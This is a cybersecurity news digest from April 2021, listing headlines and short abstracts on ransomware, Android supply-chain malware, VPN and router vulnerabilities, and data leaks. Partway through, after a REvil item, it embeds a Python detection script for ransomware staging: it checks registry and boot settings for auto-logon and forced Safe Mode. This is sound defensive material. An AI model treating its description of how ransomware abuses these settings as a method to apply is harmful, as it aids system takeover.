April 12, 2021 – Vulnerabilities
UK’s NCSC Issues Critical Alert Against Fortinet VPN Vulnerability Full Text
Abstract
The alert from the NCSC follows a report by Kaspersky detailing how cybercriminals are exploiting a Fortinet VPN vulnerability (CVE-2018-13379) to distribute ransomware by exploiting unpatched systems and remotely accessing usernames and passwords.ZDNet
April 12, 2021 – Government
Biden to nominate former NSA deputy director to serve as cyber czar Full Text
Abstract
President Biden on Monday will roll out a slate of key leaders to head his administration’s approach to cybersecurity, including nominating Chris Inglis, the former deputy director of the National Security Agency (NSA), as the national cyber director at the White House.The Hill
April 12, 2021 – General
What Does It Take To Be a Cybersecurity Researcher? Full Text
Abstract
Behind the strategies and solutions needed to counter today's cyber threats are dedicated cybersecurity researchers. They spend their lives dissecting code and analyzing incident reports to discover how to stop the bad guys. But what drives these specialists? To understand the motivations for why these cybersecurity pros do what they do, we decided to talk with cybersecurity analysts from around the world. To get viewpoints from across Europe, Asia, and the Americas, we recently spoke with a team of researchers from Acronis' global network of Cyber Protection Operations Centers (CPOCs): Candid Wüest, VP of Cyber Protection Research, who is based in Switzerland; Alexander Ivanyuk, Senior Director, Product and Technology Positioning, who is based in Singapore; and two Cybersecurity Analysts, Topher Tebow and Blake Collins, who are both based in the U.S. The conversation yielded some interesting insights into their views of the world, how they approach cyber threat ... The Hacker News
April 12, 2021 – Criminals
Europol: “Virtually All” Crime Now Has a Digital Element Full Text
Abstract
Criminals are increasingly leveraging digital tech in areas such as communication and financesInfosecurity Magazine
April 12, 2021 – Business
LinkedIn confirmed that it was not a victim of a data breach Full Text
Abstract
LinkedIn has formally denied that the recently disclosed data leak was caused by a security breach; the data were obtained via web scraping. Security Affairs
April 12, 2021 – Criminals
Criminals spread malware using website contact forms with Google URLs Full Text
Abstract
Microsoft is warning businesses to beware of cybercriminals using company website contact forms to deliver the IcedID info-stealing banking trojan in email with Google URLs to employees.ZDNet
April 12, 2021 – Vulnerabilities
Windows, Ubuntu, Zoom, Safari, MS Exchange Hacked at Pwn2Own 2021 Full Text
Abstract
The 2021 spring edition of the Pwn2Own hacking contest concluded last week on April 8 with a three-way tie between Team Devcore, OV, and Computest researchers Daan Keuper and Thijs Alkemade. A total of $1.2 million was awarded for 16 high-profile exploits over the course of the three-day virtual event organized by the Zero Day Initiative (ZDI). Targets with successful attempts included Zoom, Apple Safari, Microsoft Exchange, Microsoft Teams, Parallels Desktop, Windows 10, and Ubuntu Desktop operating systems. Some of the major highlights: an authentication bypass chained with a local privilege escalation to completely take over a Microsoft Exchange server, for which the Devcore team netted $200,000; a pair of bugs chained to achieve code execution in Microsoft Teams, earning researcher OV $200,000; a zero-click exploit targeting Zoom that employed a three-bug chain to exploit the messenger app and gain code execution on the target system ($200,000); the exploitation ... The Hacker News
April 12, 2021 – General
Brits Still Confused by Multi-Factor Authentication Full Text
Abstract
FIDO Alliance warns that social media accounts are at riskInfosecurity Magazine
April 12, 2021 – General
Fitch Ratings: Cyberattacks could pose a material risk to water and sewer utilities Full Text
Abstract
Fitch Ratings is warning that cyberattacks could pose a risk to water and sewer utilities, potentially impacting their ability to repay debt. Fitch Ratings Inc. is an American credit rating agency and one of the "Big Three" credit rating agencies, ... Security Affairs
April 12, 2021 – General
Fitch Ratings: Cyberattacks could pose a material risk to water and sewer utilities Full Text
Abstract
Fitch Ratings published an alert last week to warn of the “material risk” to water and sewer utilities caused by cyber-attacks that could also impact their ability to repay debt.Security Affairs
April 12, 2021 – General
Over 90% of Organizations Hit by a Mobile Malware Attack in 2020 Full Text
Abstract
Check Point warns of MDM threats and chip-based bugsInfosecurity Magazine
April 12, 2021 – Breach
Hackers compromised APKPure client to distribute infected Apps Full Text
Abstract
Multiple security experts discovered threat actors tampered with the APKPure client version 3.17.18 of the popular alternative third-party Android app store. APKPure is available only on devices that use Google Mobile Services (GMS).Security Affairs
April 12, 2021 – Policy and Law
Man Arrested After Failed AWS Bomb Plot Full Text
Abstract
Individual allegedly wanted to “kill off 70% of the internet”Infosecurity Magazine
April 12, 2021 – Government
India seeks US help as China-backed hacks threaten military Full Text
Abstract
India’s top military official says the country plans to seek help from the US and other countries to shore up its defense infrastructure that is vulnerable to China-backed cyber-attacks.The Times Of India
April 11, 2021 – Accident
Is the recent accident at Iran Natanz nuclear plant a cyber attack? Full Text
Abstract
On Sunday, an "accident" occurred in the electricity distribution network at Iran's Natanz nuclear enrichment site; experts speculate it was caused by a cyberattack. Security Affairs
April 11, 2021 – Privacy
Mozilla flooded with requests after Apple privacy changes hit Facebook Full Text
Abstract
Mozilla volunteers have recently been flooded with requests by online merchants and marketers for their domains to be added to what's called a Public Suffix List (PSL) due to recent privacy changes brought forth by Apple's iOS 14.5.BleepingComputer
April 11, 2021 – Solution
Top 10 Best Free Penetration Testing Tools 2021 Full Text
Abstract
When we talk about penetration testing tools, we all know very well that the first thing that comes to our... Cyber Security News
April 11, 2021 – Breach
Personal data of 1.3 million Clubhouse users leaked online Full Text
Abstract
An SQL database containing the personal data of 1.3 million Clubhouse users was leaked online for free, a few days after LinkedIn and Facebook suffered similar leaks; the leak was discovered by researchers from Cyber News. Security Affairs
April 11, 2021 – General
Security Affairs newsletter Round 309 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Clop Ransomware operators plunder US universities; Malware attack on Applus blocked vehicle inspections; ... Security Affairs
April 11, 2021 – Malware
Joker malware infected 538,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have been infected with the Joker malware after downloading tainted apps from the company's official Android store. Security Affairs
April 10, 2021 – Malware
Joker malware infects over 500,000 Huawei Android devices Full Text
Abstract
More than 500,000 Huawei users have downloaded from the company's official Android store applications infected with Joker malware that subscribes to premium mobile services.BleepingComputer
April 10, 2021 – Malware
Android malware found on Huawei’s official app store Full Text
Abstract
Researchers say the ten apps posed as legitimate applications, such as virtual keyboards, camera apps, app launchers, instant messengers, sticker collections, coloring programs, and games.The Record
April 10, 2021 – Malware
Android malware found embedded in APKPure store application Full Text
Abstract
Security researchers found malware embedded within the official application of APKPure, a popular third-party Android app store and an alternative to Google's official Play Store.BleepingComputer
April 10, 2021 – Breach
Hackers compromised APKPure client to distribute infected Apps Full Text
Abstract
APKPure, one of the largest alternative app stores, was the victim of a supply chain attack: multiple security experts discovered that threat actors tampered with client version 3.17.18 to deliver malware. Security Affairs
April 10, 2021 – Malware
Crooks abuse website contact forms to deliver IcedID malware Full Text
Abstract
Microsoft researchers spotted a malware campaign abusing contact forms on legitimate websites to deliver the IcedID malware. Security Affairs
April 10, 2021 – Criminals
This man was planning to kill 70% of Internet in a bomb attack against AWS Full Text
Abstract
The FBI arrested Seth Aaron Pendley (28), from Texas, for allegedly planning a bomb attack against Amazon Web Services (AWS) in order to "kill" about 70% of the internet. Security Affairs
April 10, 2021 – Malware
Facebook ads dropped malware posing as Clubhouse app for PC Full Text
Abstract
Threat actors are running Facebook ads that promote a Clubhouse app for PC in order to deliver malware. The attackers are reusing an old tactic: no PC version of the Clubhouse app has been released, so a fake one is an easy lure. Hackread
April 10, 2021 – Vulnerabilities
Cisco will not release updates to fix critical RCE flaw in EoF Business Routers Full Text
Abstract
According to a security advisory published by the company, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers are affected by a remote command execution vulnerability in the management interface. Security Affairs
April 10, 2021 – Ransomware
New REvil Ransomware Version Automatically Logs Windows into Safe Mode Full Text
Abstract
Once more, the well-known REvil ransomware has adapted its attack: it changes the target victim's login password and reboots the computer into Windows Safe Mode. Heimdal Security
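The two REvil items above (the Cyware entry and this one) describe the behaviour but not the on-disk artifacts it leaves, which is what a responder needs to look for. What follows is an added example, not REvil code and not a published detection. It assumes, since the abstracts do not name the mechanism, that the unattended logon is done the way Windows itself does it, through the Winlogon values AutoAdminLogon, DefaultUserName and DefaultPassword, and that Safe Mode is forced through the `safeboot` element of the boot configuration (what `bcdedit /set {current} safeboot network` writes). Either setting on its own can be legitimate; both at once on a server, with a cleartext password, is the combination to alert on. The inputs are constructed text samples shaped like `reg export` and `bcdedit /enum {current}` output (a real `reg export` file is UTF-16 and would be decoded first), so the check runs offline against collected evidence.

```python
"""Spot the auto-logon plus forced-Safe-Mode combination on a Windows host.

Added example, not REvil code and not a published detection.  Assumed
mechanism (the abstracts do not name it): Winlogon auto-logon values and
the 'safeboot' BCD element, i.e. the standard Windows ways of doing an
unattended logon and of forcing Safe Mode.  Inputs are constructed text
shaped like `reg export` and `bcdedit /enum {current}` output.
"""
import re

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# "Name"="string"  or  "Name"=dword:xxxxxxxx ; other value types are ignored.
_VALUE_RE = re.compile(
    r'^"((?:[^"\\]|\\.)+)"=(?:"((?:[^"\\]|\\.)*)"|dword:([0-9a-fA-F]{8}))\s*$')

_SAFEBOOT_RE = re.compile(r"^\s*safeboot\s+(minimal|network)\s*$", re.I | re.M)


def parse_reg_export(text, key=WINLOGON_KEY):
    """Return {value name: data} for one key from decoded .reg export text."""
    values, in_key = {}, False
    for line in text.splitlines():
        if line.startswith("["):                 # key header: [HKEY_...]
            in_key = line.strip() == f"[{key}]"
            continue
        if not in_key:
            continue
        m = _VALUE_RE.match(line)
        if not m:
            continue
        name, sz, dword = m.groups()
        if dword is not None:
            values[name] = int(dword, 16)
        else:
            values[name] = re.sub(r"\\(.)", r"\1", sz)   # undo \\ and \" escapes
    return values


def autologon_findings(winlogon, bcd_output):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    auto = str(winlogon.get("AutoAdminLogon", "0")).strip() == "1"
    if auto:
        user = winlogon.get("DefaultUserName", "<unset>")
        if winlogon.get("DefaultPassword"):
            findings.append(f"AutoAdminLogon=1 for {user} with cleartext DefaultPassword")
        else:
            findings.append(f"AutoAdminLogon=1 for {user}")
    m = _SAFEBOOT_RE.search(bcd_output)
    if m:
        findings.append(f"boot entry forces Safe Mode (safeboot {m.group(1).lower()})")
    if auto and m:
        findings.append("HIGH: auto-logon combined with forced Safe Mode; "
                        "consistent with ransomware staging, isolate and image the host")
    return findings


# Constructed sample of decoded `reg export` output; the password is a placeholder.
SUSPICIOUS_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
"DefaultUserName"="Administrator"
"DefaultPassword"="Ch4nged-by-attacker"
"Shell"="explorer.exe"
"AutoRestartShell"=dword:00000001
"""

CLEAN_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="0"
"Shell"="explorer.exe"
"""

# Constructed sample of `bcdedit /enum {current}` output after safeboot was set.
SUSPICIOUS_BCD = r"""
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 10
safeboot                Network
"""
CLEAN_BCD = "\n".join(l for l in SUSPICIOUS_BCD.splitlines()
                      if not l.startswith("safeboot"))

if __name__ == "__main__":
    for tag, reg, bcd in (("suspicious", SUSPICIOUS_REG, SUSPICIOUS_BCD),
                          ("clean", CLEAN_REG, CLEAN_BCD)):
        print(tag, autologon_findings(parse_reg_export(reg), bcd) or ["no findings"])
```

To collect the inputs on a live host: `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" winlogon.reg` and `bcdedit /enum {current} > bcd.txt`, then decode the .reg file from UTF-16 before passing it in.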
April 10, 2021 – Malware
Collaboration Platforms Increasingly Abused for Malware Distribution, Data Exfiltration Full Text
Abstract
Threat actors are increasingly abusing collaboration platforms for nefarious purposes, including malware delivery and data exfiltration, security researchers with Cisco’s Talos division report.Security Week
April 10, 2021 – Outage
Kentucky Unemployment Insurance Site Shuttered After Attack Full Text
Abstract
All the Office of Unemployment Insurance websites and portals dealing with unemployment accounts were taken offline as state IT workers attempted to bolster systems' cybersecurity capabilities, officials say.Gov Info Security
April 09, 2021 – General
Hillicon Valley: Amazon wins union election — says ‘our employees made the choice’ Full Text
Abstract
STORY OF THE DAY: Amazon came out victorious at the end of a two day vote counting session in the election to unionize the e-commerce giant’s facility in Bessemer, Ala. The closely watched election ended up breaking fairly heavily in Amazon’s favor:The Hill
April 09, 2021 – Hacker
Hackers Tampered With APKPure Store to Distribute Malware Apps Full Text
Abstract
APKPure, one of the largest alternative app stores outside of the Google Play Store, was infected with malware this week, allowing threat actors to distribute Trojans to Android devices. In an incident that's similar to that of German telecommunications equipment manufacturer Gigaset, the APKPure client version 3.17.18 is said to have been tampered with in an attempt to trick unsuspecting users into downloading and installing malicious applications linked to the malicious code built into the APKPure app. The development was reported by researchers from Doctor Web and Kaspersky. "This trojan belongs to the dangerous Android.Triada malware family capable of downloading, installing and uninstalling software without users' permission," Doctor Web researchers said. According to Kaspersky, the APKPure version 3.17.18 was tweaked to incorporate an advertisement SDK that acts as a Trojan dropper designed to deliver other malware to a victim's device. ... The Hacker News
April 9, 2021 – Vulnerabilities
Zerodium will pay $300K for WordPress RCE exploits Full Text
Abstract
Zero-day broker Zerodium announced that it has tripled its payouts for remote code execution exploits for the popular WordPress content management system. Security Affairs
April 9, 2021 – Business
LinkedIn confirms leak of 500 million profiles online, maintains incident was not a breach Full Text
Abstract
LinkedIn has become one of the most impersonated brands when it comes to phishing, and having access to such a treasure trove of information can help facilitate convincing social engineering attacks.SCMagazine
April 9, 2021 – 5G
March to 5G could pile on heavier security burden for IoT device manufacturers Full Text
Abstract
The financial burden of compliance with piling security standards could force some device manufacturers to walk away from highly regulated buyers like the Pentagon.SCMagazine
April 9, 2021 – Ransomware
To avoid penalties for ransomware payouts, incident response pros press for due diligence Full Text
Abstract
The onus is also on the threat intelligence community, said one IR expert, to practice responsible ransomware attribution, as it can affect companies’ decisions on whether or not to pay.SCMagazine
April 09, 2021 – Ransomware
The Week in Ransomware - April 9th 2021 - Massive ransom demands Full Text
Abstract
Ransomware attacks continued over the past two weeks, with a continuation of the massive initial ransom demands we have seen recently.BleepingComputer
April 9, 2021 – Covid-19
Fresh Cyberattack Waves and Latest Statistics on COVID-19 Full Text
Abstract
With multiple adversaries continuing to leverage the pandemic, an interesting technique by cybercriminals has surfaced that uses unique staging and execution mechanisms via a malicious doc.Cyware Alerts - Hacker News
April 09, 2021 – Government
Biden budget request calls for major investments in cybersecurity, emerging technologies Full Text
Abstract
President Biden called for over $1.3 billion in cybersecurity funds as part of his proposed budget request sent to Congress on Friday, along with major investments in emerging technologies such as quantum computing and artificial intelligence.The Hill
April 9, 2021 – Disinformation
Facebook Removes 16k Groups for Trading Fake Reviews Full Text
Abstract
Double intervention by UK watchdog prompts Facebook to axe groups trading in fake reviewsInfosecurity Magazine
April 9, 2021 – Government
The U.S. Government Needs to Overhaul Cybersecurity. Here’s How. Full Text
Abstract
In advance of the new Biden administration cybersecurity executive order, it’s time for the federal government to get proactive about cybersecurity.Lawfare
April 9, 2021 – Vulnerabilities
Cisco will not release updates to fix critical RCE flaw in EoF Business Routers Full Text
Abstract
Cisco announced it will not release security updates to address a critical security vulnerability affecting some of its Small Business routers. Cisco is urging customers that are using some of its Small Business routers to replace their devices because...Security Affairs
April 9, 2021 – Privacy
Rhythm in the algorithm: digital rights groups call on Spotify to abandon voice recognition invention Full Text
Abstract
Activists launched a campaign to pressure Spotify to abandon plans for an AI-powered system that listens to your conversations in order to recommend music choices. The controversy spotlights a challenge faced by some of the most tech-savvy companies: how to walk the line between innovation that serves the innate desires of consumers and violation of their rights to information security and privacy.SCMagazine
April 9, 2021 – Policy and Law
DOJ: Creep Coach Finagles Nude Athlete Photos Full Text
Abstract
Allegedly perv college coach charged with cyberstalking and extorting nudes from his female athletes.Threatpost
April 09, 2021 – Policy and Law
FBI arrests man for plan to kill 70% of Internet in AWS bomb attack Full Text
Abstract
The FBI arrested a Texas man on Thursday for allegedly planning to "kill of about 70% of the internet" in a bomb attack targeting an Amazon Web Services (AWS) data center on Smith Switch Road in Ashburn, Virginia.BleepingComputer
April 9, 2021 – General
Attackers are Tearing Apart the Retail Sector Full Text
Abstract
Disruptive cyberattacks on retailers are becoming more common, and experts have recently noted the use of the double-extortion technique among hackers targeting retail organizations.Cyware Alerts - Hacker News
April 9, 2021 – Policy and Law
US Jails Cyber-stalker Who Targeted Attack Survivor Full Text
Abstract
Florida man who cyberstalked survivor of murder attempt is sent to prisonInfosecurity Magazine
April 09, 2021 – Ransomware
Leading cosmetics group Pierre Fabre hit with $25 million ransomware attack Full Text
Abstract
Leading French pharmaceutical group Pierre Fabre suffered a REvil ransomware attack where the threat actors initially demanded a $25 million ransom, BleepingComputer learned today.BleepingComputer
April 9, 2021 – APT
APTs Exploiting Fortinet VPN Security Vulnerabilities - Cybersecurity Agencies Warn Full Text
Abstract
Nation-state APTs are actively exploiting known vulnerabilities in the Fortinet FortiOS cybersecurity OS to gain initial access to multiple government, commercial, and technology services.Cyware Alerts - Hacker News
April 9, 2021 – Vulnerabilities
LifeLabs Launches Vulnerability Disclosure Program Full Text
Abstract
Canadian medical laboratory teams up with Bugcrowd to boost cybersecurityInfosecurity Magazine
April 09, 2021 – Malware
Attackers deliver legal threats, IcedID malware via contact forms Full Text
Abstract
Threat actors are using legitimate corporate contact forms to send phishing emails that threaten enterprise targets with lawsuits and attempt to infect them with the IcedID info-stealing malware.BleepingComputer
April 9, 2021 – Vulnerabilities
Critical Zoom vulnerability triggers remote code execution without user input Full Text
Abstract
The researchers from Computest demonstrated a three-bug attack chain against Zoom that caused remote code execution on a target machine, and all without any form of user interaction.ZDNet
April 09, 2021 – Breach
World’s largest pathologists association discloses credit card incident Full Text
Abstract
The American Society for Clinical Pathology (ASCP) disclosed a payment card incident that impacted customers who entered payment info on its e-commerce website.BleepingComputer
April 9, 2021 – Phishing
The geography and network characteristics of phishing attacks Full Text
Abstract
The country where emails originate and the number of countries they are routed through on the way to their final destination offer important warning signs of phishing attacks.Barracuda
April 9, 2021 – Ransomware
Maze/Egregor ransomware cartel estimated to have made $75 million Full Text
Abstract
The group behind the Maze and Egregor ransomware operations are believed to have earned at least $75 million worth of Bitcoin from ransom payments following intrusions at companies all over the world.The Record
April 09, 2021 – Vulnerabilities
Zerodium triples WordPress remote code execution exploit payout Full Text
Abstract
Zerodium has announced today an increased interest in exploits for the WordPress content management system that achieve remote code execution.BleepingComputer
April 9, 2021 – Attack
Washington State Educational Organizations Targeted in Cryptojacking Campaign Full Text
Abstract
According to a new advisory released by Palo Alto Network's Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State.ZDNet
April 09, 2021 – Malware
Alert — There’s A New Malware Out There Snatching Users’ Passwords Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild in phishing attacks to deploy credential stealers and other malicious payloads. Dubbed "Saint Bot," the malware is said to have first appeared on the scene in January 2021, with indications that it's under active development. "Saint Bot is a downloader that appeared quite recently, and slowly is getting momentum. It was seen dropping stealers (i.e. Taurus Stealer) or further loaders (example), yet its design allows [it] to utilize it for distributing any kind of malware," said Aleksandra "Hasherezade" Doniec, a threat intelligence analyst at Malwarebytes. "Furthermore, Saint Bot employs a wide variety of techniques which, although not novel, indicate some level of sophistication considering its relatively new appearance." The infection chain analyzed by the cybersecurity firm begins with a phishing email containing an embedded ZIP file ("bitcoin.zip&quoThe Hacker News
April 9, 2021 – General
NCSC: Large Number of Brits Are Using Easily Guessable Passwords Full Text
Abstract
The survey found 15% of Brits use their pet's name as a passwordInfosecurity Magazine
April 9, 2021 – Vulnerabilities
Pwn2Own 2021: participants earned $1.2M of the $1.5M prize pool Full Text
Abstract
The Pwn2Own 2021 hacking competition has concluded; participants earned more than $1.2 million, the greatest total payout ever. The Pwn2Own 2021 hacking competition reached its end; participants earned more than $1.2 million, which is more than ever...Security Affairs
April 09, 2021 – Vulnerabilities
Researchers earn $1.2 million for exploits demoed at Pwn2Own 2021 Full Text
Abstract
Pwn2Own 2021 ended with contestants earning a record $1,210,000 for exploits and exploits chains demoed over the course of three days.BleepingComputer
April 9, 2021 – General
A rush to remote working leaving businesses vulnerable to cybercriminals Full Text
Abstract
Verizon reveals that many businesses may have left themselves vulnerable and open to cybercriminals in the rush to ensure their workforce could operate remotely during the pandemic.Help Net Security
April 09, 2021 – Education
[WHITEPAPER] How to Achieve CMMC Security Compliance for Your Business Full Text
Abstract
For organizations that deal with the defense infrastructure – cybersecurity is more than just a buzzword. Recently the US Department of Defense (DoD) created a new certification process – the Cybersecurity Maturity Model Certificate (CMMC) – to ensure that all its vendors and contractors follow established best cybersecurity practices. For organizations that work along the DoD supply chain, this means adhering to a strict regulatory framework, which can be quite complex. For one, they must ensure that cybersecurity processes and practices are aligned with the type and sensitivity of the information that needs to be protected. Even though the model is tiered (from "basic cybersecurity hygiene" to "advanced"), organizations will expend a significant effort to ensure they align with the compliance level appropriate for their contracts. This is why one XDR provider has created a new guide to demonstrate how it helps organizations achieve CMMC compliance (download the whitepaper here). TThe Hacker News
April 9, 2021 – Insider Threat
Learning from Recent Insider Data Breaches Full Text
Abstract
Organizations need to ramp up their monitoring and detection capabilitiesInfosecurity Magazine
April 9, 2021 – Government
CISA releases post-compromise tool Aviary to review Microsoft 365 Full Text
Abstract
CISA released a Splunk-based dashboard for post-compromise activity in Microsoft Azure Active Directory (AD), Office 365, and MS 365 environments. The Cybersecurity and Infrastructure Security Agency (CISA) has released a Splunk-based dashboard,...Security Affairs
April 9, 2021 – Hacker
Cloud-native watering hole attack: Simple and potentially devastating Full Text
Abstract
The perpetrators are as diverse as their targets – fraudsters looking to steal identities, cybercriminal gangs in pursuit of quick profits, state-backed attackers seeking access to larger networks.Help Net Security
April 9, 2021 – General
#COVID19 Fraud Surge Threatens to Overwhelm Banks Full Text
Abstract
Remote workers struggle with disjointed systems and outdated technologyInfosecurity Magazine
April 9, 2021 – Breach
70,000 SSNs, 600,000 Credit Card Records Leaked After Swarmshop Gets Hacked Full Text
Abstract
On March 17, a huge cache of the site’s user and administrator data was leaked online to a different underground forum, a new report published Thursday by threat research firm Group-IB shows.Gizmodo
April 9, 2021 – Vulnerabilities
Moodle flaw exposed users to account takeover Full Text
Abstract
Moodle is an open-source educational platform used by 179,000 sites and has 242 million users. It allows universities to easily distribute content to students and teachers.Security Affairs
April 9, 2021 – Breach
Update: Belden Says Health-Related Information Exposed in Data Breach Full Text
Abstract
Specialty networking solutions provider Belden on Wednesday shared an update on the data breach disclosed in November 2020, and said health-related information was also exposed.Security Week
April 09, 2021 – Vulnerabilities
Cisco Will Not Patch Critical RCE Flaw Affecting End-of-Life Business Routers Full Text
Abstract
Networking equipment major Cisco Systems has said it does not plan to fix a critical security vulnerability affecting some of its Small Business routers, instead urging users to replace the devices. The bug, tracked as CVE-2021-1459, is rated with a CVSS score of 9.8 out of 10, and affects RV110W VPN firewall and Small Business RV130, RV130W, and RV215W routers, allowing an unauthenticated, remote attacker to execute arbitrary code on an affected appliance. The flaw, which stems from improper validation of user-supplied input in the web-based management interface, could be exploited by a malicious actor to send specially-crafted HTTP requests to the targeted device and achieve remote code execution. "A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the affected device," Cisco said in its advisory. Security researcher Treck Zhou has been credited with reporting the vulnerability. AlthoughThe Hacker News
April 9, 2021 – Breach
Hackers Hacked as Underground Carding Site is Breached Full Text
Abstract
Swarmshop admins, buyers and sellers on the receiving end of cyber-attackInfosecurity Magazine
April 9, 2021 – Business
SAP partners with Onapsis to mitigate active threats against unprotected SAP applications Full Text
Abstract
SAP and Onapsis jointly released a cyber threat intelligence report providing actionable information on how malicious threat actors are targeting unprotected mission-critical SAP applications.Help Net Security
April 09, 2021 – Malware
Gigaset Android Update Server Hacked to Install Malware on Users’ Devices Full Text
Abstract
Gigaset has revealed a malware infection discovered in its Android devices was the result of a compromise of a server belonging to an external update service provider. Impacting older smartphone models — GS100, GS160, GS170, GS180, GS270 (plus), and GS370 (plus) series — the malware took the form of multiple unwanted apps that were downloaded and installed through a pre-installed system update app. The infections are said to have occurred starting March 27. The German manufacturer of telecommunications devices said it took steps to alert the update service provider of the issue, following which further infections were prevented on April 7. "Measures have been taken to automatically rid infected devices of the malware. In order for this to happen the devices must be connected to the internet (WLAN, WiFi or mobile data). We also recommend connecting the devices to their chargers. Affected devices should automatically be freed from the malware within 8 hours," the compThe Hacker News
April 9, 2021 – General
UK Firms Suffer Record Number of Cyber-Attacks in Q1 Full Text
Abstract
Remote working continues to expose organizationsInfosecurity Magazine
April 9, 2021 – Breach
330K stolen payment cards and 895K stolen gift cards sold on dark web Full Text
Abstract
A threat actor has sold almost 900,000 gift cards and over 300,000 payment cards on a cybercrime forum on the dark web. A crook has sold 895,000 gift cards and over 300,000 payment cards, for a total of US$38 million, on a top-tier Russian-language...Security Affairs
April 9, 2021 – Vulnerabilities
Report: Supplier Impersonation Attacks a Major Risk Full Text
Abstract
Threat actors are leveraging the supply chain to deliver various types of threats to organizations, and few of them are spared from such attacks, according to a new report from Proofpoint.Security Week
April 9, 2021 – Covid-19
Wine scams spiked during COVID-19 lockdown Full Text
Abstract
Wine-themed domain registrations rose once COVID-19 lockdowns took hold, some of them malicious and used in phishing campaigns, Recorded Future and Area 1 Security said in a joint report.Cyberscoop
April 9, 2021 – Phishing
Hackers Use Google Forms and Telegram bots to Collect Phished Credentials Full Text
Abstract
Cybercriminals are increasingly using legitimate services such as Google Forms and Telegram to gather user data stolen on phishing websites. Alternative ways...Cyber Security News
April 08, 2021 – Vulnerabilities
Google Chrome blocks port 10080 to stop NAT Slipstreaming attacks Full Text
Abstract
Google Chrome is now blocking HTTP, HTTPS, and FTP access to TCP port 10080 to prevent the ports from being abused in NAT Slipstreaming 2.0 attacks.BleepingComputer
April 8, 2021 – Phishing
Digital artists meet scam artists, as criminals pounce on NFT craze Full Text
Abstract
Criminals are standing up fraudulent NFT-themed websites that sell nonexistent items or phish users’ credentials.SCMagazine
April 8, 2021 – Breach
Hackers hit nine countries, expose 623,036 payment card records Full Text
Abstract
Hackers hacking hackers: User data of the Swarmshop card shop – which trades in stolen personal and payment records – was leaked online on March 17 and posted on a different underground forum.SCMagazine
April 08, 2021 – Government
CISA releases tool to review Microsoft 365 post-compromise activity Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has released a companion Splunk-based dashboard that helps review post-compromise activity in Microsoft Azure Active Directory (AD), Office 365 (O365), and Microsoft 365 (M365) environments.BleepingComputer
April 08, 2021 – Attack
Major DC insurance provider hacked by ‘foreign cybercriminals’ Full Text
Abstract
CareFirst BlueCross BlueShield’s Community Health Plan District of Columbia (CHPDC) suffered a data breach carried out by what it described as a “foreign cybercriminal” group in January that potentially impacted sensitive data, the company told customers this week.The Hill
April 8, 2021 – Ransomware
Cring ransomware spread through hole in FortiGate VPN Full Text
Abstract
In the early months of 2021 the ransomware operators struck a series of European industrial networks.SCMagazine
April 8, 2021 – Malware
Adware Spreads via Fake TikTok App, Laptop Offers Full Text
Abstract
Cybercriminals are encouraging users to send the “offers” via WhatsApp to their friends as well.Threatpost
April 8, 2021 – Vulnerabilities
Zero-Day Bug Impacts Problem-Plagued Cisco SOHO Routers Full Text
Abstract
Cisco says it will not patch three small business router models and one VPN firewall device with critical vulnerabilities.Threatpost
April 08, 2021 – Vulnerabilities
Google Chrome blocks a new port to stop NAT Slipstreaming attacks Full Text
Abstract
Google Chrome is now blocking HTTP, HTTPS, and FTP access to TCP port 10080 to prevent the ports from being abused in NAT Slipstreaming 2.0 attacks.BleepingComputer
April 8, 2021 – Breach
Moodle flaw exposed users to account takeover Full Text
Abstract
Wizcase experts discovered a security flaw in the open-source learning platform Moodle that could allow account takeover. At the beginning of October 2020, the Wizcase cyber research team, led by Ata Hakcil, discovered a security vulnerability...Security Affairs
April 08, 2021 – Breach
Over 600,000 stolen credit cards leaked after Swarmshop hack Full Text
Abstract
The hacking spree targeting underground marketplaces has claimed another victim as a database from card shop Swarmshop emerged on another forum.BleepingComputer
April 8, 2021 – Malware
IcedID Banking Trojan Surges: The New Emotet? Full Text
Abstract
A widespread email campaign using malicious Microsoft Excel attachments and Excel 4 macros is delivering IcedID at high volumes, suggesting it’s filling the Emotet void.Threatpost
April 08, 2021 – Breach
Belden says health benefits data stolen in 2020 cyberattack Full Text
Abstract
Belden has disclosed that additional data was accessed and copied during their November 2020 cyberattack related to employees' healthcare benefits and family members covered under their plan.BleepingComputer
April 8, 2021 – Policy and Law
College Track Coach Accused of Cyberstalking Full Text
Abstract
Athletics coach arrested on suspicion of tricking female athletes into sending him nudesInfosecurity Magazine
April 8, 2021 – General
98% of Organizations Received Email Threats from Suppliers: What You Should Know Full Text
Abstract
Proofpoint’s recent research indicates that 98% of nearly 3,000 monitored organizations across the U.S., UK, and Australia, received a threat from a supplier domain over a 7-day window in February.Proofpoint
April 8, 2021 – Malware
(Are you) afreight of the dark? Watch out for Vyveva, new Lazarus backdoor Full Text
Abstract
ESET researchers have discovered a previously undocumented Lazarus malware backdoor used to attack a freight logistics company in South Africa, which they have dubbed Vyveva.ESET Security
April 08, 2021 – Breach
Belden finds more personal data stolen in 2020 cyberattack Full Text
Abstract
Belden has disclosed that additional data was accessed and copied during their November 2020 cyberattack related to employees' healthcare benefits and family members covered under their plan.BleepingComputer
April 8, 2021 – Business
OneTrust raises $210M to expand its enterprise compliance solutions Full Text
Abstract
OneTrust, a privacy, marketing, security, and data governance firm based in Atlanta, Georgia, today announced it has raised $210 million in a series C extension led by SoftBank’s Vision Fund 2.Venture Beat
April 8, 2021 – Vulnerabilities
BleedingTooth: Google drops full details of zero-click Linux Bluetooth bug chain leading to RCE Full Text
Abstract
